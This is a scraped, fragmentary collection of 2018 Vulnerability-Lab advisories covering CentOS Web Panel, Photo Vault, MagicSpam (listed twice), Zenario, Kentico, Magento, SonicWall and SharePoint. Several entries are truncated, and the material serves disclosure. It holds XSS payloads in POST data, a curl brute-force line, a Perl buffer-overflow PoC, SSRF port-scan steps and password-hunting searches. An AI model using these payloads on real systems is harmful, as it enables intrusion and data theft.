vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
CentOS Web Panel v0.9.8.12 - Multiple Persistent Web Vulnerabilities
rv:45.0) Gecko/20100101 Firefox/45.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[http://localhost:2030/index.php?module=mail_add-new] Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1] Connection[keep-alive] POST-Daten: ifpost[yes] email_address[%3E%22%3CPAYLOAD INJECTION POINT!+src] domain[test-domain.com] password[%3E%22%3CPAYLOAD INJECTION POINT!+src] Response Header: Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27] X-Powered-By[PHP/5.4.27] Keep-Alive[timeout=5, max=100] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html] PoC: POST via add Mailbox in email input Email domain test-domain.com created. Mailbox a"<%3E%22%3CPERSISTENT SCRIPT CODE PAYLOAD EXECUTION!+src>@test-domain.com created. Create a New Email Account or Forwarder (MailBox/Forwarder) Here you can create a new email account or forwarder. Create a New Email Account (MailBox) Minimize Reference(s): http://localhost:2030/index.php?module=mail_add-new Solution - Fix & Patch: === The vulnerabilities can be patched by a sanitize in the vulnerable `id` and `email address` parameters of the index.php file POST method request. Disallow usage of special chars and restrict the parameter input to prevent script code injection attacks. Filter in the output error location or the item listing the vulnerable location were the code point occurs. Security Risk: == The security risk of the application-side input validation vulnerabilities in the web-application are estimated as medium. (CVSS 4.4) Credits & Authors: == Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Photo Vault v1.2 iOS - Insecure Authentication Vulnerability
Document Title: === Photo Vault v1.2 iOS - Insecure Authentication Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2110 Release Date: = 2018-01-16 Vulnerability Laboratory ID (VL-ID): 2110 Common Vulnerability Scoring System: 4.8 Vulnerability Class: Insecure Storage of Sensitive Information Current Estimated Price: 1.000€ - 2.000€ Product & Service Introduction: === https://itunes.apple.com/us/app/id1053383947 Abstract Advisory Information: == The vulnerability labortory core research team discovered a insecure authentication issue in the official Vulnerability Disclosure Timeline: == 2018-01-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): PhotoRange Product: Photo Vault - Mobile (Web-Application) 1.2 Exploitation Technique: === Local Severity Level: === Medium Technical Details & Description: An insecure configuration vulnerability has been discovered in the official iOS mobile Photo Vault v1.2 iOS web-application. The vulnerability is located in the login mechanism and password request communication. In case of the activated wifi in the app it is possible to remotly access (http-server) the protected vault by a password. The password request is a simple less protected attempt to the login.html file with `_` to split between the password and file. There is no request limitation to block automated attacks. Attackers can perform fast enumerate the password by simply audits against the http basic authentication mechanism. Remote attackers can use an automated dictionary attack or compromise by manual basic http bruteforce attack via curl, nmap or http-brute. Attackers can fast gain unauthorized access the private vault over the activated wifi web-application in the same network. A second minor problem is that there is no https protocol activated for the wifi http-server communication in the network. Taken together, these two problems pose a significant risk to users and individuals, based on sensitive information stored in the vault of the mobile iOS application. The security risk of the insecure authentication configuration vulnerability is estimated as medium with a cvss count of 4.8. Exploitation of the vulnerability requires network access to connect to the web-server via wifi without user interaction. Successful exploitation of the vulnerability results in unauthorized access to private vault data or sensitive information. Proof of Concept (PoC): === The security issue can be exploited by remote attackers without privileged user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. PoC: http_code=$(curl -L -data password="passwdords.txt" "$url http://Localhost:9900/login.html__; -w '%{http_code}' -o /root/fuzztime -s) #forensic --- PoC Session Logs [GET] --- GET http://localhost:9900/login.html Host: Localhost:9900 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://Localhost:9900/ Connection: keep-alive Upgrade-Insecure-Requests: 1 Date: Sat, 06 Jan 2018 15:06:20 GMT Accept-Ranges: bytes Transfer-Encoding: chunked Note: Requests first the login page - GET http://localhost:9900/login.html__passwd1 Host: Localhost:9900 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost:9900/login.html Connection: keep-alive Upgrade-Insecure-Requests: 1 Date: Sat, 06 Jan 2018 15:06:26 GMT Accept-Ranges: bytes Transfer-Encoding: chunked Note: Access to vault of ios mobile application was cracked in a forensic access test within 15 minutes. Reference(s): http://localhost:9900/ http://localhost:9900/login.html http://localhost:9900/login.html__ Security Risk: == The security risk of the vulnerability in the mobile vault application is eastimated as medium (CVSS 4.8). Credits & Authors: == Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerabili
MagicSpam 2.0.13 - Insecure File Permission Vulnerability
Document Title: === MagicSpam 2.0.13 - Insecure File Permission Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2113 Release Date: = 2018-01-12 Vulnerability Laboratory ID (VL-ID): 2113 Common Vulnerability Scoring System: 2.8 Vulnerability Class: Privacy Violation - Information Disclosure Current Estimated Price: 500€ - 1.000€ Product & Service Introduction: === MagicSpam comes fully-integrated with any Plesk 12+ package, blocking spam at the edge before it gets a chance to be filtered. There’s no need to change DNS or MX records. And your protection comes ready to go with complete logging, statistics, and custom controls. (Copy of the Homepage: https://www.plesk.com/extensions/magicspam/ ) Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered a insecure file permission vulnerability in the MagicSpam 2.0.13-1 plesk extension. Vulnerability Disclosure Timeline: == 2017-01-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): LinuxMagic Product: MagicSpam - Plesk Extension 2.0.13-1 Exploitation Technique: === Remote Severity Level: === Low Technical Details & Description: An insecure file permission access vulnerability has been discovered in the MagicSpam 2.0.13-1 plesk extension. The vulnerability allows an attacker to access sensitive information like emails without permission or authentication. Plesk panel features the freemium extension MagicSpam providing industry-leading spam protection technologies. MagicSpam is keeping a detailed log of all e-mail messages processed under directory /var/log/magicspam/ in Ubuntu installations. A log file is created with the name mslog, with readable permissions for everyone, and rotated daily. The file will reveal the full list of mailboxes on the server (provided they received or sent at least one message in the past). The security risk of the permission vulnerability is estimated as low with a common vulnerability scoring system count of 2.8. Successful exploitation of the file permission security vulnerability results in information disclosure of emails. Proof of Concept (PoC): === The insecure file permission vulnerability can be exploited by remote attackers without user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. $ id uid=1002(marco) gid=1011(marco) groups=1011(marco) $ cd /var/log/magicspam/ $ ls -l -rw-r--r-- 1 magicspam root 348937 Jan 10 11:50 mslog $ tail -n1 mslog 2018-01-10 11:51:26 magicspam-daemon[335]: HAM: mua=no,ip=[93.94.32.17:mail15.clab99a.contactlab.it],helo=,from=<564020151.35960.1000...@t.contactlab.it>,rcpt=<i...@thenetworksolution.it> Solution - Fix & Patch: === The security vulnerability can be resolved byan exclude of the emails in the list of the affected application log files. Another solution could be to integration an authentication mechanism for the log file of the magic spam web-application. Security Risk: == The security risk of the insecure file permission vulnerability in the plesk extension magic spam is estimated as medium (CVSS 2.8). Credits & Authors: == Marco Marsala [ma...@thenetworksolution.it] - https://www.vulnerability-lab.com/show.php?user=Marco+Marsala Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations
Zenario v7.6 CMS - SQL Injection Web Vulnerability
1ExIotzyCRzQ%3D%3D%22%2C%22session%22%3Afalse%7D%7D] Response Header: Server[Apache/2.4.23 (Ubuntu)] X-Frame-Options[SAMEORIGIN] Content-Length[1862] Connection[Keep-Alive] Content-Type[text/html; charset=UTF-8] Reference(s): http://zenario.localhost:8080/ http://zenario.localhost:8080/zenario/ http://zenario.localhost:8080/zenario/admin/ http://zenario.localhost:8080/zenario/admin/admin_boxes.ajax.php Solution - Fix & Patch: === 1. Escape the content of the name input field 2. Sanitize the parameter of the current_value 3. Disallow the usage of special chars in the current_value parameter 4. Use a prepared statement to prevent further exploitation Security Risk: == The security risk of the remote sql-injection web vulnerability in the web-application is estimated as medium (cvss 5.7). Credits & Authors: ====== Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability
d the xml config file to overwrite the ecx and eip registers. The installation path and the iis website values are not exploitable, because of the active content restrictions of the process that drops an invalid argument exception to prevent. PoC: Exploit Code (XML) PoC: Exploitation (Perl) #!/usr/bin/perl my $Buff = "A" x 3000; open(MYFILE,'>>kentico_unicode_payload.txt'); print MYFILE $Buff; close(MYFILE); print "PoC (c) Vulnerability-Laboratory"; --- PoC Debug Session Logs [WinDBG] --- (1522.21ec): Stack buffer overflow - code c409 eax= ebx=0044b208 ecx=00410041 edx=513cc7c2 esi=003a22d0 edi=00477cd0 eip=41004100 esp= ebp= iopl=0 nv up ei pl nz na po nc cs=001c ss=0022 ds=0022 es=0022 fs=002c gs= efl= 41414141 cc22 - EXCEPTION_RECORD: -- (.exr ) ExceptionAddress: 41414141 ExceptionCode: c409 (Stack Buffer Overflow) ExceptionFlags: 0001 NumberParameters: 1 Parameter[0]: 0002 Solution - Fix & Patch: === The vulnerability can be patched by a secure file size and input character restriction like on the iis scheme website input. Parse the full xml file on import and restrict the memory size on imports to prevent further buffer overflow attacks. Security Risk: == The security risk of the local stack buffer overflow vulnerability in the kentico cms software is estimated as high. (CVSS 6.0) Credits & Authors: == Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - SUBMISSION REVIEW TEAM DOMAIN: www.vulnerability-lab.com
MagicSpam 2.0.13 - Insecure File Permission Vulnerability
Document Title: === MagicSpam 2.0.13 - Insecure File Permission Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2113 Release Date: = 2018-01-12 Vulnerability Laboratory ID (VL-ID): 2113 Common Vulnerability Scoring System: 2.8 Vulnerability Class: Privacy Violation - Information Disclosure Current Estimated Price: 500€ - 1.000€ Product & Service Introduction: === MagicSpam comes fully-integrated with any Plesk 12+ package, blocking spam at the edge before it gets a chance to be filtered. There’s no need to change DNS or MX records. And your protection comes ready to go with complete logging, statistics, and custom controls. (Copy of the Homepage: https://www.plesk.com/extensions/magicspam/ ) Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered a insecure file permission vulnerability in the MagicSpam 2.0.13-1 plesk extension. Vulnerability Disclosure Timeline: == 2017-01-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): LinuxMagic Product: MagicSpam - Plesk Extension 2.0.13-1 Exploitation Technique: === Remote Severity Level: === Low Technical Details & Description: An insecure file permission access vulnerability has been discovered in the MagicSpam 2.0.13-1 plesk extension. The vulnerability allows an attacker to access sensitive information like emails without permission or authentication. Plesk panel features the freemium extension MagicSpam providing industry-leading spam protection technologies. MagicSpam is keeping a detailed log of all e-mail messages processed under directory /var/log/magicspam/ in Ubuntu installations. A log file is created with the name mslog, with readable permissions for everyone, and rotated daily. The file will reveal the full list of mailboxes on the server (provided they received or sent at least one message in the past). The security risk of the permission vulnerability is estimated as low with a common vulnerability scoring system count of 2.8. Successful exploitation of the file permission security vulnerability results in information disclosure of emails. Proof of Concept (PoC): === The insecure file permission vulnerability can be exploited by remote attackers without user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. $ id uid=1002(marco) gid=1011(marco) groups=1011(marco) $ cd /var/log/magicspam/ $ ls -l -rw-r--r-- 1 magicspam root 348937 Jan 10 11:50 mslog $ tail -n1 mslog 2018-01-10 11:51:26 magicspam-daemon[335]: HAM: mua=no,ip=[93.94.32.17:mail15.clab99a.contactlab.it],helo=,from=<564020151.35960.1000...@t.contactlab.it>,rcpt=<i...@thenetworksolution.it> Solution - Fix & Patch: === The security vulnerability can be resolved byan exclude of the emails in the list of the affected application log files. Another solution could be to integration an authentication mechanism for the log file of the magic spam web-application. Security Risk: == The security risk of the insecure file permission vulnerability in the plesk extension magic spam is estimated as medium (CVSS 2.8). Credits & Authors: == Marco Marsala [ma...@thenetworksolution.it] - https://www.vulnerability-lab.com/show.php?user=Marco+Marsala Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations
Magento Commerce - SSRF & XSPA Web Vulnerability
Document Title: === Magento Commerce - SSRF & XSPA Web Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1631 Release Date: = 2018-01-03 Vulnerability Laboratory ID (VL-ID): 1631 Common Vulnerability Scoring System: 4.7 Vulnerability Class: Server Side Request Forgery Current Estimated Price: 1.000€ - 2.000€ Product & Service Introduction: === Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security ) Abstract Advisory Information: == The Vulnerability Laboratory Core Research Team discovered SSRF/XSPA vulnerability in the official Magento Commerce online service web-application. Vulnerability Disclosure Timeline: == 2018-01-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Ebay Inc. Product: Magento - Web Application Service 2015 Q4 Exploitation Technique: === Remote Severity Level: === Medium Technical Details & Description: SSRF/XSPA vulnerability has been discovered in the official Magento Commerce online service web-application. The vulnerability allows remote attackers to perform malicious server-side requests to compromise the computer system or to gain unauthorized access to data or sensitive information. The XSPA & SSRF allows to use the process functionality of the magento engine as port scanner for the local or any random remote machine in the same network. The issue is the first documented xspa and ssrf issue in the magento service web-applications. The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.7. Exploitation of the ssrf/xspa vulnerability requires a privileged web-application user account and no user interaction. Successful exploitation of the issue can result in web-server or web-application compromise or unauthorized malicious interactions. Proof of Concept (PoC): === Remote attackers are able to perform a local scan on the protected web-server firewall to magento.com and magentocommerce.com For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open http://magento.com/security-patch (Magento Shoplift Bug Tester) 2. Write in the website input www.magento.com:22 3. Click to bug scan for the port 22 4. Successful reproduce of the issue! --- Scan Log NMAP --- Starting Nmap 6.00 at 2016-08-15 15:10 EEST Initiating Ping Scan at 15:10 Scanning magento.com (66.211.190.110) [4 ports] Completed Ping Scan at 15:10, 0.17s elapsed (1 total hosts) Initiating SYN Stealth Scan at 15:10 Scanning magento.com (66.211.190.110) [100 ports] Discovered open port 80/tcp on 66.211.190.110 Discovered open port 443/tcp on 66.211.190.110 Discovered open port 8443/tcp on 66.211.190.110 Discovered open port 8080/tcp on 66.211.190.110 Completed SYN Stealth Scan at 15:10, 2.38s elapsed (100 total ports) ...... Note: SSRF/XSPA allows to scan the local host to discovered the open service ports (References: https://cwe.mitre.org/data/definitions/918.html) Solution - Fix & Patch: === The vulnerability has been resolved as bug bounty issue by the magento security team in 2017. Security Risk: == The security risk of the ssrf/xspa web vulnerability that allows to scan the infrastructure behind the firewall is estimated as medium (CVSS 4.7). Credits & Authors: == Vulnerability Laboratory [Core Research Team] (resea...@vulnerability-lab.com) [www.vulnerability-lab.com] Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab
SonicWall GMS v8.1 - Filter Bypass & Persistent Vulnerability
date or by manual interaction to prevent attacks. Security Risk: == The security risk of the persistent input validation vulnerability and filter bypass issue is estimated as medium. (CVSS 4.1) Credits & Authors: == Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] [www.vulnerability-lab.com] Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Microsoft Sharepoint 2013 - Limited Access Permission Bypass Vulnerability
Document Title: === Microsoft Sharepoint 2013 - Limited Access Permission Bypass Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2111 Release Date: = 2018-01-07 Vulnerability Laboratory ID (VL-ID): 2111 Common Vulnerability Scoring System: 4.8 Vulnerability Class: Filter or Protection Mechanism Bypass Current Estimated Price: 1.000€ - 2.000€ Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered a permission bypass vulnerability in the Microsoft Sharepoint online service web-application. Vulnerability Disclosure Timeline: == 2018-01-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Microsoft Corporation Product: Sharepoint Online Service - (Web-Application) 2013 Exploitation Technique: === Local Severity Level: === Medium Technical Details & Description: A permission level bypass web vulnerability has been identified in the microsoft sharePoint 2013 online service web-application & maybe prior versions. The security vulnerability allows attackers to open or view restricted items in the site or library. An authenticated user can bypass `Limited Access` permissions to browse a page or library to access a specific content item that was restricted. Proof of Concept (PoC): === POC 1: 1. Search for specific words inside web & mobile sharepoint search box: `password` `pass` `user` `domainuser` `name | lastname` ... [~] web search: http://site/BSearch/results.aspx [~] mobie search: http://site/_layouts/mobile/MobileResults.aspx example : http://site/BSearch/results.aspx?k=password example : http://site/BSearch/results.aspx?k="NSA1377; example : http://site/_layouts/mobile/MobileResults.aspx?k=pass example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB 2. The page shown some of sharepoint's search results like restricted specific item, site, library urls etc 3. so click at the urls to access|viwe|read site page and other restricted library and items POC 2: After capturing packets between our system and the sharepoint site (use fiddler or burpsiute, wireshark ...) We have access to items, list, pages, sites urls like as follows: http://site/IT/Lists/List70/AllItems.aspx Access to restricted items & lists by make /LIST#/ urls Example: http://site/IT/Lists/List100/AllItems.aspx http://site/IT/Lists/List101/AllItems.aspx http://site/IT/Lists/List102/AllItems.aspx Security Risk: == The security risk of the bypass vulnerability in the microsoft sharepoint 2013 application is estimated as medium (CVSS 4.8). Credits & Authors: == Behnam Vanda [beni.va...@gmail.com] [redhathackers] - https://www.vulnerability-lab.com/show.php?user=Behnam+Vanda Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnera
Magento Connect T1 - (Claim) Persistent Vulnerability
.magentocommerce.com/magento-connect/claim/claim/new/] Cookie X-Forwarded-For[8.8.8.8] Connection[keep-alive] Post Data: claim%5Bclaimed_extension_url%5D[%22%3E%3Ciframe+src%3D%22javascript%3Aalert%28document.cookie%29%22%3E%3C%2Fiframe%3E] claim%5Boriginal_extension_url%5D[] claim%5Bdescription%5D[] claim%5Bdigital_signature%5D[] Response Headers: Server[nginx] Content-Type[text/html; charset=UTF-8] Connection[keep-alive] P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Set-Cookie[frontend=4edl2ftb4c6qoe11lieojciaj7; path=/magento-connect/; domain=www.magentocommerce.com] Content-Length[71413] Solution - Fix & Patch: === The security vulnerability is marked as fixed within 2017 Q1 - 2017 Q4 by the magento developer team. Security Risk: == The security rsik of the persistent input validation web vulnerability is estimated as medium (CVSS 3.8). Credits & Authors: == Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or 